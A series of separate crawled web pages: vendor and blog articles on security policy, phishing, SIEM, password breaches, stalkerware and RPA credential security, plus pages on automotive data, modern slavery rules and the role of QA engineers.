- Cryptography usage
- Data and asset classification
- Data retention
- Data support and operations
- Data usage
- Email protection policies
- Identity and access management
- Incident response
- Insider Threat Protection
- Internet usage restrictions
- Mobile device policy
- Network security
- Password and credential protocols
- Patch management
- Personnel security
- Physical and environmental security
- Ransomware detection
- System update schedule
- Wireless network and guest access policy
- 8. Enforcement
- 9. User training
- 10. Contacts
- 11. Version history
Information Security Policy Best Practices
Established best practices for an information security policy lead with obtaining executive buy-in. Implementation and enforcement are much easier and more effective when the policy has the support of top leadership.
Other best practices for information security policy development include:
- Establish objectives.
- Identify all relevant security regulations—corporate, industry, and government.
- Customize the information security policy.
- Align the policy with the needs of the organization.
- Inventory all systems, processes, and data.
- Identify risks.
- Assess security related to systems, data, and workflows.
- Document procedures thoroughly and clearly.
- Review procedures carefully to ensure they are accurate and complete.
- Train everyone who has access to the organization's data or systems on the rules that are outlined in the information security policy.
- Review and update the policy regularly.
Take Information Security Policy Development Seriously
A well-developed information security policy helps improve an organization’s security posture by raising awareness. It also provides the guidance needed to include all users in baseline security preparedness that ultimately protects your organization’s data and systems. Investing in the development and enforcement of an information security policy is well worth the effort.
Egnyte has experts ready to answer your questions. For more than a decade, Egnyte has helped more than 16,000 customers with millions of customers worldwide.
Last Updated: 12th July, 2021 | <urn:uuid:0f9d783b-2376-43b5-a94b-d7f2df99acae> | CC-MAIN-2022-40 | https://www.egnyte.com/guides/governance/information-security-policy | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00402.warc.gz | en | 0.891758 | 1,435 | 3.125 | 3 |
Most threat actors these days are more mature than they were before. An organization will find out about a cyber attack on its network, in the late stages of the attack, when the damage has already been caused. However, one of the most critical stages in the cyber kill chain is the delivery of the malware.
Over the years, many malware delivery techniques have been found by threat actors, but one of the methods that has remained popular throughout the years is a phishing attack. A phishing attack is a social engineering attack in which a threat actor sends a fraudulent message to trick victims into exposing sensitive information or “”open a door”” that will let them into the organization’s network.
According to the most recent statistics of 2021, at least 91% of cyber attacks begin with phishing. It looks like the end-users are the weakest link in the cyber security chain, and threat actors know that.
Phishing attacks might be delivered by:
- Email – containing a malicious attachment or containing a link to the malicious website.
- Website – usually using a copy of a login page of the legitimate website (such as Paypal, Ebay, etc.).
- SMS – redirecting a victim to a fake website or malicious download page.
- Well know social networks like Twitter, Facebook or LinkedIn – with a request to download some resume of job candidates, a fake login page to get the user’s credentials by offering the victim coupons for discounts, etc.
The most common way of delivery is by email attachment pretending to be an invoice, or the hot topic of the last year, an email about COVID-19. The attachment is usually a macro embedded Excel/Word document since most organizations use a mail-relay product to prevent malicious executables of any kind from entering the inside network. The purpose of the macro will most obviously be a malicious file download from the remote Command and Control Server and its execution.
Popular malwares downloaded following phishing attacks are Trickbot, Emotet, Ursnif, etc.
Minerva Labs has a unique approach to phishing attacks. Our simulation technology prevents the malicious activity of Microsoft Office products, including the consecutive payload delivery and its execution.
Figure 1 – Malicious excel file uses eqnedt32.exe to execute arbitrary code | <urn:uuid:8da5b438-97e6-4a86-ae9f-2b1e05daa4d6> | CC-MAIN-2022-40 | https://minerva-labs.com/blog/phishing-attacks-and-minerva-armor/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00402.warc.gz | en | 0.925005 | 537 | 2.515625 | 3 |
What Is SIEM?
And why is it a critical security tool?
What is SIEM?
The security information and event management, or SIEM definition, according to TechTarget is, “an approach to security management that combines SIM (security information management) and SEM (security event management) functions into one security management system.”
Security information and event management systems address the three major challenges that limit rapid incident response:
- The vast amount of unaggregated security data makes it hard to see what’s happening and prioritize threats.
- IT teams are understaffed/undertrained due to the cybersecurity skills gap.
- The need to demonstrate compliance takes time away from threat identification and response.
What is SIEM? Next-Level Architecture Explained
SIEM systems are critical for organizations mitigating an onslaught of threats. With the average organization’s security operations center (SOC) receiving more than 10,000 alerts per day, and the biggest enterprises seeing over 150,000, most enterprises do not have security teams large enough to keep up with the overwhelming number of alerts. However, the growing risk posed by ever more sophisticated cyber threats makes ignoring alerts quite dangerous. A single alert may mean the difference between detecting and thwarting a major incident and missing it entirely. SIEM security delivers a more efficient means of triaging and investigating alerts. With SIEM technology, teams can keep up with the deluge of security data. [Link to new problem education paper in progress]
Security information and event management (SIEM) solutions collect logs and analyze security events along with other data to speed threat detection and support security incident and event management, as well as compliance. Essentially, a SIEM technology system collects data from multiple sources, enabling faster response to threats. If an anomaly is detected, it might collect more information, trigger an alert, or quarantine an asset.
While SIEM technology was traditionally used by enterprises and public companies that needed to demonstrate compliance, they have come to understand that security information and event management is much more powerful. The SIEM technologies have since evolved as a key threat detection tool for organizations of all sizes. Given the sophistication of today’s threats and that the cybersecurity skills shortage is not improving, it is critical to have security information event management that can quickly and automatically detect breaches and other security concerns. SIEM capabilities are driving more small and medium-sized organizations to deploy a security and event management solution as well.
How SIEM Works?
Some organizations may still be wondering, “What does SIEM do?” SIEM technology gathers security-related information from servers, end-user devices, networking equipment, and applications, as well as security devices. Security event and information management (SIEM) solutions sort the data into categories and when a potential security issue is identified, can send an alert or respond in another manner, according to pre-set policies. The aggregation and analysis of data gathered throughout the network enable security teams to see the big picture, identify breaches or incidents in the early stages, and respond before damage is done.
SIEM systems ingest and interpret logs from as many sources as possible including:
- Firewalls/unified threat management systems (UTMs)
- Intrusion detection systems (IDS) and intrusion prevention systems (IPS)
- Web filters
- Endpoint security
- Wireless access points
- Application servers
SIEM systems look at both event data and contextual data from these logs for analysis, reports, and monitoring. IT teams can effectively and efficiently respond to security incidents based on these results.
Why SIEM: Critical Benefits?
Security information and event management solutions provide key threat-detection capabilities, real-time reporting, compliance tools, and long-term log analysis. The top benefits are:
- Increased security effectiveness and faster response to threats. To be useful, a security and event management solution must “enable an analyst to identify and respond to suspicious behavior patterns faster and more effectively than would be possible by looking at data from individual systems,” according to the SANS Institute. To be truly effective, it must be able to prevent successful breaches.
- Efficient compliance demonstration. SIEM technology should also make it easy for SIEM IT teams to track and report compliance with industry and governmental regulations and security standards.
- Significant reduction in complexity. Consolidating security event data from multiple applications and devices enables fast and comprehensive analysis. In addition, repetitive tasks are automated and tasks that previously required experts can be performed by less experienced staff.
Choosing a SIEM Vendor: Your Buying Guide
“The global security information and event management market accounted for $2.59B in 2018 and is expected to grow at a CAGR of 10.4% during the forecast period 2019 - 2027, to $6.24B by 2027,” according to a recent SIEM report by Research and Markets.
This fast-growing market feeds a lot of competition, so it’s important to know what to look for in a security information and event management solution. At the very least, a SIEM solution must be able to:
- Collect data from every security device
- Aggregate, correlate, and analyze the data
- Automate wherever possible
- Monitor business services, not just devices
For more details on what really matters when selecting a SIEM solution, read the eBook.
Most organizations will want more than just basic functionality from a security information and event management solution. The following checklist provides guidance on specific features that will maximize return on investment (ROI):
Seamless integration into existing security and network architectures
Whether the security architecture is based on the Fortinet Security Fabric or a multi-vendor environment, a security information and event management solution must integrate seamlessly. It needs to be able to automatically discover and ingest data from numerous security and IT devices, including those that are region-specific or industry-specific.
At the outset, it must include flexible deployment options, rapid deployment, and be easily customizable, without the need for extensive professional services.
The solution also must be able to scale with business growth.
High-fidelity, prioritized alerts
Without event correlation and analysis, even consolidated data is worthless. The SIEM solution must use multiple methods to determine what conclusions should be drawn from the data.
Also, key is to employ an intelligent infrastructure and application discovery engine that automatically maps the topology of both physical and virtual infrastructure, on-premises and in public/private clouds, providing context for event analysis. This eliminates the wasted time and errors that can occur when this information is added manually.
Further, a top SIEM solution will correlate user identities with their network (IP) addresses and devices. This event context, together with robust rule sets and advanced analytics, enables threat prioritization, flagging those that require immediate attention. As a result, administrators can address high-risk events promptly and offload low-risk events to automated response processes.
Automated incident mitigation
An ideal SIEM solution uses security orchestration automation and response (SOAR) to orchestrate the appropriate response through multi-vendor security devices. It can respond automatically or alert a human operator, depending on the event’s level of risk and complexity. This flexibility helps organizations achieve the right balance of response speed and human oversight in the face of explosive growth in security data and the acceleration of threats.
High-value business insights from a single pane of glass
Typical security information and event management solutions do not present event information in a business context. However, this is very useful and should be included. For example, a SIEM dashboard could be configured to present the status of the company’s e-commerce service, rather than the status of the individual devices—servers, networking equipment, and security tools—that support that service. This enables the security team to deliver meaningful updates to the lines of business.
Alternatively, security administrators can quickly see which business services would be impacted if a particular device were unavailable or compromised. Most importantly, a single staff member can oversee all security information and event management activities from a central console.
A solution with pre-defined reports supporting a wide range of compliance auditing and management needs including PCI-DSS, HIPAA, SOX, NERC, FISMA, ISO, GLBA, GPG13, and SANS Critical Controls helps security teams that have also taken on compliance duties. SIEM security teams can save time and minimize compliance training. Meeting audit/reporting deadlines without having to acquire in-depth knowledge of regulations and reporting content requirements is also advantageous.
Why Fortinet FortiSIEM?
Security management only gets more complex as more applications, endpoints, IoT devices, cloud deployments, virtual machines, etc. are added to the network. To secure this exploding attack surface requires visibility of all devices and all the infrastructure—in real time. But context is also needed. Organizations need to know what devices represent a threat and where.
Fortinet’s security information and event management system, FortiSIEM, brings together visibility, correlation, automated response, and remediation in a single, scalable solution. FortiSIEM reduces the complexity of managing network and security operations to effectively free resources, improve breach detection, and even prevent breaches. What’s more is that Fortinet’s architecture enables unified data collection and analytics from diverse information sources including logs, performance metrics, security alerts, and configuration changes. FortiSIEM essentially combines the analytics traditionally monitored in separate silos of the security operations center (SOC) and network operations center (NOC) for a more holistic view of the security and availability of the business.
Top features of FortiSIEM include:
Asset self-discovery to reduce false positives by understanding a device’s contextual capabilities
Rapid integrations and scalability with network-aware and vendor-agnostic operations and management to enable a real-time business view of availability, utilization, and security posture
Automated workflow driven by a leading security orchestration and automated response engine (SOAR) to quickly respond to threats
Single-pane-of-glass view brings teams together to swiftly remediate service issues
The FortiSIEM security information and event management solution goes beyond the considerations of a typical solution on the market. Besides including seamless integration, high-fidelity, prioritized alerts, automated incident mitigation, high-value business insights from a single pane of glass, and compliance-ready reporting it has a number of other essential capabilities.
FortiSIEM’s value is summed up by eWeek: “This solution provides core SIEM capabilities in addition to complementary features that include a built-in configuration management database (CMDB), file integrity monitoring (FIM), and application and system performance monitoring.” The FortiSIEM CMDB engine automatically discovers all the elements (devices, applications, users, IoT devices, etc.) connected to the network, and their respective interrelationships. The SIEM delivers a comprehensive and holistic topology map that continues to self-learn and report on any changes beyond the initial baseline.
FortiSIEM is available in a number of form factors to fit smoothly into any network architecture: hardware appliances, virtual machines, and on Amazon Web Services (AWS). Physical appliances with varying levels of performance are available to provide a variety of options. The FortiSIEM architecture is a scale-out, enterprise- and service provider-ready, multitenant framework. Each FortiSIEM Collector can monitor more than 10,000 security events per second (EPS) and more than 1,000 devices for high performance and availability.
Enterprise Strategy Group (ESG) performed an in-depth examination of FortiSIEM’s capabilities and effectiveness in a SIEM technical validation test. ESG Lab confirmed that Fortinet’s FortiSIEM “delivers context, visibility, and rapid response by cross-correlating security, performance, and availability data from heterogeneous systems. This enables a security organization to discover, investigate, and respond to security, performance, and availability events rapidly, which provides the tools needed to address incidents completely with swift, focused, confident action. By shortening the time from detection to resolution, organizations can shave valuable time off their remediation processes, saving not just time, but effort, and money.”
The test concluded, “FortiSIEM’s unique capabilities in cybersecurity and IT operations management provide the real-time and historical analytics—with correlated context—needed for organizations to confidently detect and resolve anomalous activity and incidents and preserve business continuity.”
Learn more about Fortinet FortiSIEM. | <urn:uuid:fa4c3c17-2b3d-4a63-9d2c-ca7f2add2979> | CC-MAIN-2022-40 | https://www.fortinet.com/de/resources/cyberglossary/what-is-siem | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00402.warc.gz | en | 0.921182 | 2,638 | 2.8125 | 3 |
Last week, social feeds and web articles flooded the
Internet with notification of a major password hacking from the professional
It was reported that a Russian hacker breached over 6.46 million accounts. The
company released an apology and is still working on repairing the damage. Just
when things were starting to settle down, reports stated that the very same hacker had
accessed more than 1.5 million accounts on dating site, eHarmony.com.
Although this was significantly less, the concerns were just as high, if not
worse. How could this be happening all over the web? Social media poses a huge
threat beyond just the over abundance of personal information people share of
these sites. Eric Knapp, VP of Client Services, says, All social media accounts
require an email. Once a hacker has an email address and a password its easy
enough to continue hacking other accounts.
Users also make themselves vulnerable to multiple attacks by using the
same passwords for every account. Unfortunately, this finding was not dispersed
soon enough and this is not the end of the story.
Just this week, 10,000 Twitter accounts
were reported as being hacked via Twitter-app. This breach made profiles, full
names, passwords, and locations all public information after a group of hackers got into the system. All the sites that have been hacked this month have issued
public statements and urged their users to change their passwords. This has
become a pretty standard procedure and has proven not to protect their users.
If these accounts were hacked before, what difference does a new password make
for the next time?
Social media sites and other sites that require users to form
an account need to look deeper into preventing Internet fraud by enforcing
better security measures. A password should be the bare minimum, not the
solution. Integrating identity verification could help prevent the amount of online hacking. This would
require further criteria other than an email and password in order to access
account information. The more common password hacking becomes, the easier it
will become and harder to prevent. Sites
that want to stay ahead of the security curve need to consider building a wall
between entering login information and accessing the account by investing in outside security measures. This will help prevent future hackings and unsatisfied
[Contributed by, EVS Marketing] | <urn:uuid:65ba899e-c922-469b-8d5b-e736e438483f> | CC-MAIN-2022-40 | https://www.electronicverificationsystems.com/blog/Social-Media-Poses-Serious-Security-Threats | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00402.warc.gz | en | 0.948525 | 489 | 2.59375 | 3 |
Stalkerware refers to tools, apps, software programs, and devices that let another person (a stalker) secretly watch and record information on another person’s device. Parents use this type of tool to keep an eye on their children. Criminals often use such software for invasive and intrusive spying on individuals of interest.
Stalkerware can see and monitor many things on your mobile devices including access photos/videos you take, web browser history, text message conversations, call history, and even your location. Stalkerware with privileged access to your device can turn on your webcam or microphone, take screenshots, see activity on third-party apps (Snapchat or WhatsApp), and intercept, forward, or even record phone calls.
Smartphone stalkerware tools typically require a hacker to have physical access to your device to install the malware. Once installed, it runs in stealth mode without any notification to the end-user of the device that it is present. Stalkerware is difficult to detect and remove.
What does this mean for an SMB?
Stalkerware, as well as other cyber threats, often get into your systems through end-users. Studies show that 90% of cyber-attacks are caused by human error where your users succumb to phishing or social engineering attacks. It’s so important for you to help employees avoid human errors. Follow CyberHoot’s best practices to avoid, prepare for, and prevent damage from cyber attacks:
- Adopt two-factor authentication on all critical Internet-accessible services
- Adopt a password manager for better personal/work password hygiene
- Require 14+ character Passwords in your Governance Policies
- Follow a 3-2-1 backup method for all critical and sensitive data
- Train employees to spot and avoid email-based phishing attacks
- Check that employees can spot and avoid phishing emails by testing them
- Document and test Business Continuity Disaster Recovery (BCDR) plans
- Perform a risk assessment every two to three years
Start building your robust, defense-in-depth cybersecurity plan at CyberHoot.
To learn more about Stalkerware, watch this short 3-minute video:
CyberHoot does have some other resources available for your use. Below are links to all of our resources, feel free to check them out whenever you like:
- Cybrary (Cyber Library)
- Press Releases
- Instructional Videos (HowTo) – very helpful for our SuperUsers!
Note: If you’d like to subscribe to our newsletter, visit any link above (besides infographics) and enter your email address on the right-hand side of the page, and click ‘Send Me Newsletters’. | <urn:uuid:10e73f88-60e2-435c-9e7d-262d2ce58104> | CC-MAIN-2022-40 | https://cyberhoot.com/cybrary/stalkerware/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00602.warc.gz | en | 0.907939 | 577 | 2.53125 | 3 |
Automotive data is information about vehicles and their users. The range of data is wide: vehicle type, model, movement patterns and speed, road hazards, and more are available for car owners, dealerships, manufacturers, and city planners.
Some basic automotive data like model, make, and year comes from companies and dealerships. Newer cards, however, come equipped with data collection devices that measure car location, speed, date since the last maintenance check, distance from road hazards and gas stations, and more.
Other sources of this data include accident reports, insurance claims, sources like Ward’s Automotive Yearbook, surveys, and apps like Waze.
Most datasets include vehicle type, model, and year. These may include data on fuel efficiency, emissions, safety, and location. However, there are micro and nano-level datasets for specific purposes. These datasets provide information about specific components of a vehicle that manufacturers and safety testers need.
In short, the attributes of your dataset depend on your need.
Many different types of people use automotive data. Car owners use it to determine whether their vehicle runs efficiently or whether a new purchase would suit their needs. Manufacturers and marketers use the data to determine whether they should improve vehicle quality or change marketing campaigns. App developers combine the automotive data with geospatial data to advertise local gas stations or other points of interest. City planners use the data to plan public transportation routes and determine where to build parking lots or which roads are most unsafe.
With more technological advances in the automotive industry as well as pressures to keep intellectual properties confined to one company, testing automotive data is a daunting task. However, the risks of faulty data can be dire. For this reason, you or your data vendor should first ensure that the dataset is complete, updated frequently, and that the data-measuring devices within the vehicle are in good shape. Second, you should ensure the dataset is properly cleaned to be as accurate as possible. Finally, you or your vendor should build safeguards into your data management systems to flag anomalies as soon as possible.
“Less data transfer allows for quicker processing, lower latency, and uses less power. In effect, this is like SMS between vehicles.
“But how it will hold up over time isn’t clear. “When it comes to failure rates and design for life, we are just beginning — along with many of the other challenges with autonomous driving and ride sharing — to look at what it means to have people drive cars more than an hour and half a day,” said Lance Williams, vice president for automotive strategy at ON Semiconductor. “This could be a ‘driving 22 hours a day’ type of scenario.”’
X-Byte’s dataset – ‘X-Byte | Car Rental Data – Global Coverage – Datasets Spanning All Major Car Rental Sites & Aggregators’ provides Retail & Commerce Data, Automotive Industry Data and GPS Data that can be used in Price Segmentation Strategy, Pricing Optimization and
TRAK Data’s dataset – ‘TRAK Data – Full US Consumer Automotive Data – Reach Vehicle Owners, In-Market Auto Shoppers, Target by Make, Model, Year, New, Used, Geography’ provides Marketing Attribution Data, Automotive Industry Data, Individual Data, and Consumer Lifestyle Data that can be used in and Targeted Marketing
TagX’s dataset – ‘Image Dataset of Cars with highlighted Damages’ provides Automotive Industry Data and Economic Data that can be used in | <urn:uuid:29814ad9-beda-4439-b3a2-30ed6a90f5a7> | CC-MAIN-2022-40 | https://www.data-hunters.com/category/industry-specific-data/automotive-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00602.warc.gz | en | 0.919595 | 741 | 2.953125 | 3 |
The ILO (International Labour Organization) estimates that there are 40.3 million people in modern slavery in the world today, including 24.9 million in forced labour.
As globalisation creates more opportunities for organisations to secure cheaper supplies, the risk of exploitation in supply chains increases.
In the UK, the MSA (Modern Slavery Act) 2015 sets out measures to combat modern slavery and trafficking. It applies to organisations that do business in the UK and have a global turnover of more than £36 million.
Section 54 of the Act, “Transparency in supply chains”, requires commercial organisations to publish a slavery and human trafficking statement for each financial year.
The Home Office’s guidance recommends that your statement covers the following:
You can use these six areas to demonstrate that your organisation is acting ethically and in line with the law.
Help your employees understand what modern slavery is, its global impact and how it affects your organisation with our Modern Slavery Staff Awareness E-learning Course. | <urn:uuid:6427dd6c-6778-4a0c-afdf-bbc926f9e554> | CC-MAIN-2022-40 | https://www.grcelearning.com/topic/modern-slavery | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00602.warc.gz | en | 0.909045 | 211 | 2.90625 | 3 |
Robotic Process Automation (RPA) is a powerful, emerging technology and a hot topic of conversation. Despite the buzz, many people remain fuzzy on understanding the specifics. Does RPA mean that organizations will soon employ armies of futuristic robots to do the work that humans once did (remember the movie I, Robot)?
Not quite. Let’s start with a definition. RPA is “the use of software with artificial intelligence and machine learning capabilities to handle high-volume tasks that previously required a human to perform.” In other words, RPA uses “software robots” to automate much of the manual “hand work” involved in daily business, such as entering data (invoices, POs, etc.) from one application into another. What RPA does NOT focus on is the “head work,” or cognitive automation, required to extract information from unstructured sources. This is the work—and irreplaceable value—of humans in the organization. RPA is not meant to replace employees, but rather, allow them to leverage their experience and capabilities and focus their efforts on business-critical work. RPA simply fills in the gaps—providing 24×7, cross-geography support for time-consuming, repetitive tasks.
Here’s how a typical task could be automated by a “software robot:”
First, a single manual process is used to create a business process flow. The robots would then record that process. From there, any necessary rules, policies or exceptions to that process are identified and assigned to humans to manage. The robotic process is put into production and repeated over and over again. Throughout this loop, corrective actions are made to continuously refine the process and maximize operational efficiency, productivity and cost-savings.
RPA and Privilege Connection
So what do IT security professionals need to know about RPA platforms and the connection to privileged credentials? Simply put, it is a new attack vector and organizations need to protect the powerful, privileged accounts within these RPA platforms.
Because RPA software interacts directly with business applications and mimics the way applications use and mirror human credentials and entitlements, this can introduce significant risks when the software robots automate and perform routine business processes across multiple systems.
To minimize these risks, securing robotic credentials is paramount. In order to automate processes within an environment, software robots need “power access” (or privileged access) to carry out their mission—whether it be logging into a system(s) to access data or moving a process from step A to step B. This results in a large amount of credentials being stored in the application. An attacker that gains access to the RPA password storage location and cracks the proverbial “password piñata,” can then take the credentials, and ultimately, take control of the robots. Just like any other compromised commercial off-the-shelf (COTS) application, attackers can leverage these powerful credentials to do their bidding—but with RPA, it’s at an even greater scale. Most organizations employ multiple—sometimes hundreds or even thousands of—software robots, which access multiple systems and perform multiple processes simultaneously. With this in mind, you can appreciate the magnitude of risk to the enterprise.
Locking Down RPA Credentials
CyberArk solves the privileged access security challenge for both human and application users. Through the C3 Alliance, we’ve partnered with some of the world’s leading RPA players, including Automation Anywhere, BluePrism, WorkFusion and UiPath, to provide a simple, easy-to-deploy and cost-effective solution to this growing security challenge. This best-in-breed credential management solution:
- Implements and manages a unique account for every target system that needs to be accessed by a robot: This eliminates the need to put a powerful credential, such as a domain credential, into the application’s server for the robots to leverage. Additionally, if a system is breached, the breach will only affect that particular system—there will not be a larger, ripple effect across multiple systems.
- Securely stores and retrieves credentials: Instead of storing credentials within the application, robots can request credentials from CyberArk’s centralized, encrypted vault, as needed, via CyberArk Application Identity Manager, to perform their necessary tasks.
Here’s an illustration of this in action:
Interested in learning more about securing RPA with CyberArk? Watch a recent, on-demand webinar, which outlines what IT security professionals need to know about RPA platforms and the connection to privileged credentials. And for further reading, discover five RPA security best practices for privileged credentials and access, and download the “The CISO View: Protecting Privileged Access in Robotic Process Automation.” | <urn:uuid:7e7a2d5e-9cd6-4330-bc4e-9626cbca0745> | CC-MAIN-2022-40 | https://www.cyberark.com/resources/blog/the-power-and-potential-of-robotic-process-automation-and-the-security-risks | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00602.warc.gz | en | 0.920365 | 999 | 3.171875 | 3 |
Do you know why Mars Climate Orbiter Spacecraft, which supposedly the most ground-breaking project, had failed so miserably? Just because someone failed to use the right units.
Seriously? Yes, this is what happens when small errors — that could have been easily avoided by quality testing — are neglected. Do you know, often these basic errors cause unbearable financial or reputation losses no matter whether the project is well documented, delivered on time, and following business requirements.
Think of the time when Heathrow airport got into trouble when they opened a new Terminal 5.
So, if you want to avoid such expensive mistakes, think of hiring a Quality Assurance (QA) Engineer, whose main job is to prevent defects, ensuring the quality of your development process and its results. This is how big ventures secure a sound position in the market. They know how to achieve an edge over their competitors, thanks to their dedicated QA efforts.
What is Quality Assurance (QA)?
As the name refers, Quality Assurance (QA) is a systematic process that determines whether a product or service follows the set of requirements. This is the essential element of quality management that focuses on providing confidence in how far the quality requirements have been fulfilled.
Software Quality Assurance aims to improve work processes and efficiency, enabling companies to win customer confidence and boost their credibility. Being preventive, a QA system identifies flaws, if any, in the approaches, methods, techniques, and processes that are designed to complete a project.
QA has two fundamentals:
- To ensure the highest quality of a product by controlling its progress.
- To test the hell out of every feature.
Being a part of your team, QA engineers should be involved in the product development process — right from the very beginning. They will identify risks, collect and adjust requirements by analyzing customers’ briefs; and yes, discuss with the developer if some solution will not be accepted.
Who is a QA Engineer?
A Quality Assurance Engineer is a person who is responsible for the quality of the final product. It is his/her job to maximize the quality of the product by testing it throughout the development process.
The role is different in every company. You might find successful QA Engineers or QA Analysts who don’t know anything about the coding or development process, but their work is to test the final product for bugs and fixes. On the other hand, you will find other companies that hire a mid to senior-level developer who also knows every step of the development process or coding. A QA Engineer looks at the quality mainly from a business perspective but mixed with a technical approach.
Let’s discuss in more detail the contribution of a QA Engineer in a Software Development Company.
A QA Engineer’s Contribution to SDLC (Software Development Life Cycle)
In a perfect world example, a QA Engineer contributes a crucial part in the entire Software Development Life Cycle. An SDLC testing cycle is a frequency within which QA Engineers conduct five test stages — that is, each sprint.
Here, you will see all the five phases a QA Engineer goes through with specific tasks. So, let’s begin:
Phase # 1: Gathering Details — Determining Approach to QA on the Project
It is the first and most crucial stage in the entire SDLC.
In the first initial meeting, a client describes everything they want. They provide an outline of the functionality of the desired platform, may it be a web or app. The client will provide the list of all the things they will need in the platform, from technology to features.
Once the requirement from the client has been obtained, the next tasks include:
- Analyzing and deciding whether the requirements can be integrated into a single system.
- Which solutions will work and which won’t.
- Planning the required software development testing stages and techniques.
Phase # 2: Validation — Verifying requirements of a planned project
Validation is a process of QA of the project earlier to its development starts. Finding out the project’s capability if it will meet users’ expectations and if the idea is worth investing time and money into. During this process, the QA Engineers collaborate with the client and the project leader to research the market and users’ expectations.
The research aims to analyze if the product will make sense to the market and users. Gathering feedback from clients regarding design, features, and usability will help improve the user experience.
Validation is a critical stage, and without it, the product may never reach its audience. This stage also provides indications that the product will be profitable for the client. Otherwise, why bother in the first place?
Phase # 3: Test Planning — Writing Test Cases
In this stage, a QA Engineer will create test cases or test scenarios. These test cases are basically users’ stories that define how the application will behave. We have listed an example of two such test cases or test scenarios below:
If this phase is not clear, the testing process would be full of unexpected obstacles and contingencies. To ensure further stages follow a strict sequence of action, the QA’s job is to make up and document the action plan. Otherwise, the process itself might be clumsy.
We at Selleo use Behavior-Driven (BDD) approach at this stage. BDD solves both of these agile problems beautifully through process efficiency.
Phase # 4: Testing developed features manually
After the test plan is done, a QA engineer will move on to the next stage, creating a testing environment and executing test cases. It is good to perform various types of tests to ensure the maximum quality of the product. Some of these test examples are:
- Exploratory Test— It is a type of software testing in which test cases are not developed in advance, but testers check the system on the fly. Using this test case, a QA will write a list of things he needs to test in the software before execution. The focus of exploratory testing is more on testing as a “thinking” activity. Exploratory testing is all about discovery, investigation, and learning. In this test case, the tester has freedom of responsibility.
- System Integration Test— It is defined as a software testing method that took place in an integrated hardware and software environment to verify the behavior of the complete system. This type of software testing is conducted to evaluate the system’s compliance with its specified requirement.
- Regression Tests— It is defined as a type of testing performed on a recent program or code change that has not adversely affected existing features. A Regression testing is a full or partial selection of already executed test cases which are re-executed to ensure the platform’s existing functionalities. The motive of Regression testing to make sure that the old code is still working fine after the latest code changes are done.
Phase # 5: Test automation
Automated tests are different from manual tests where a human is sitting in front of the computer, carefully executing the test steps. The most significant of automation testing is that test cases are executed automatically which saves a lot of time.
After executing all the tests on the software, if all the functions were working fine, we marked the test as Passed. In this way, we make sure that we are not missing any details, and the product is fine. But if a test case fails, it means the coding is not properly done, and the QA will fail the product and send the report to the developer to check and do the needful.
The QA report explains in detail what went wrong or not. If issues were detected, each of them must be well documented to ensure fast bug fixes without any misunderstandings from the developers’ side. Now, let’s talk about the advantages you will get from having a QA Engineer in your team.
Four Key Benefits of having a QA Engineer in your Team
There are thousands of products and services available in the market, so how companies differentiate their product from their competitors to ensure superior quality? This is where the Quality Assurance department, or QA for short, comes into play.
There are countless benefits of having a QA Engineer in your team, but we will talk about the four essential benefits.
Save Time and Money
A highly-qualified and experienced QA Engineer contributes to building the application, which saves time and money for the company. Just take it this way, if inconsistencies and bugs are not reported at the earlier stage, it will cost the company more time and money to repeat the entire process.If developing an extensive software system, miscommunication can easily happen between the developers. This miscommunication can lead to a buggy application. In the worst scenarios, the coding didn’t work at all. A QA Engineer will work throughout the process and keep the chain intact via a proper Test Plan. Finding ambiguities and mistakes in stated requirements contributes to the biggest value. The sooner a bug is found, the less damage it does to the whole project.
If a QA engineer supports the kick-off of the project, it can also speed up the whole process as the client knows what to provide from the very beginning.
Improving the Quality of the Product/Service
If a project team doesn’t have QA Engineers, that means somebody else (developers, analysts, or even project managers) needs to perform tests of the application and may not do it correctly. A QA engineer focuses on approving delivered content instead of delivering the content itself. Because of that, he has a slightly different approach than a developer.
Both developers and testers have the same goal, but the perspective is different. A developer tests the application hoping that no issues are found as that would mean additional work for him or other developers.
A QA engineer is not involved in fixing issues (excluding retesting, which is usually not so time-consuming). That allows him not to be biased by concerns or fear while searching for further issues.
Moreover, as QA engineers spend more time on testing than developers, they know more techniques of how to find bugs and strange behaviors of the application. A QA Engineer spends time researching the market and customers’ demand, so they know what the right motive of the application is. Developers do not improve their skills in testing as much as in developing — this is QA engineers’ role. Some testers are eager to find issues, which is not a bad approach.
A Proper Alignment of Duties within the Team
The presence of QA engineers in a project helps in dividing the right jobs to the right people. In theory, anybody can click through the application and test provided functionalities.
As a result, everybody happens to do it, so it consumes developers’, analysts’, and project managers’ time, which should be spent on other things. If there are people responsible for QA in the project, everybody can focus on their duties. Besides, the quality of the application gains appropriate attention from people dedicated to assuring it.
QA Engineers Help Secure Company Reputation
What if the application you just released has many bugs? Well, you will lose your clients, and it will be forever. Repeat the same scenario, but this time, it is the app for a client you are dealing with. Not only will your client reputation be drastically damaged because of a buggy app you designed, but your reputation will be damaged too.
A QA Engineer provides better insight into the product or service. The analysis of a QA engineer can help determine the risk a company faces while launching the application in the market. Quality Assurance team ensures that the product or service introduced by the company is not only of high quality but also as per the expectations of the clients.
Believe it or not, a QA saves millions of rupees of a company from damages and even legal actions that the client might take in case of their loss. Plus, consider the cost of repairing the product or service that has already been launched in the market. Nowadays, QA testing isn’t a formality; it is a business analysis tool.
A QA Engineer is the need for every company’s hour, whether it be a product based or services based. Companies that deal with clients for developing software are more likely to have QA Analysts, QA Specialist, or QA Engineer for ensuring the overall quality of the product.
The development companies with having an impressive and competent QA program can attract more clients. The fact of having an experienced QA team reinforces its reputation as a high-quality supplier with its customers and strengthens employee commitment.
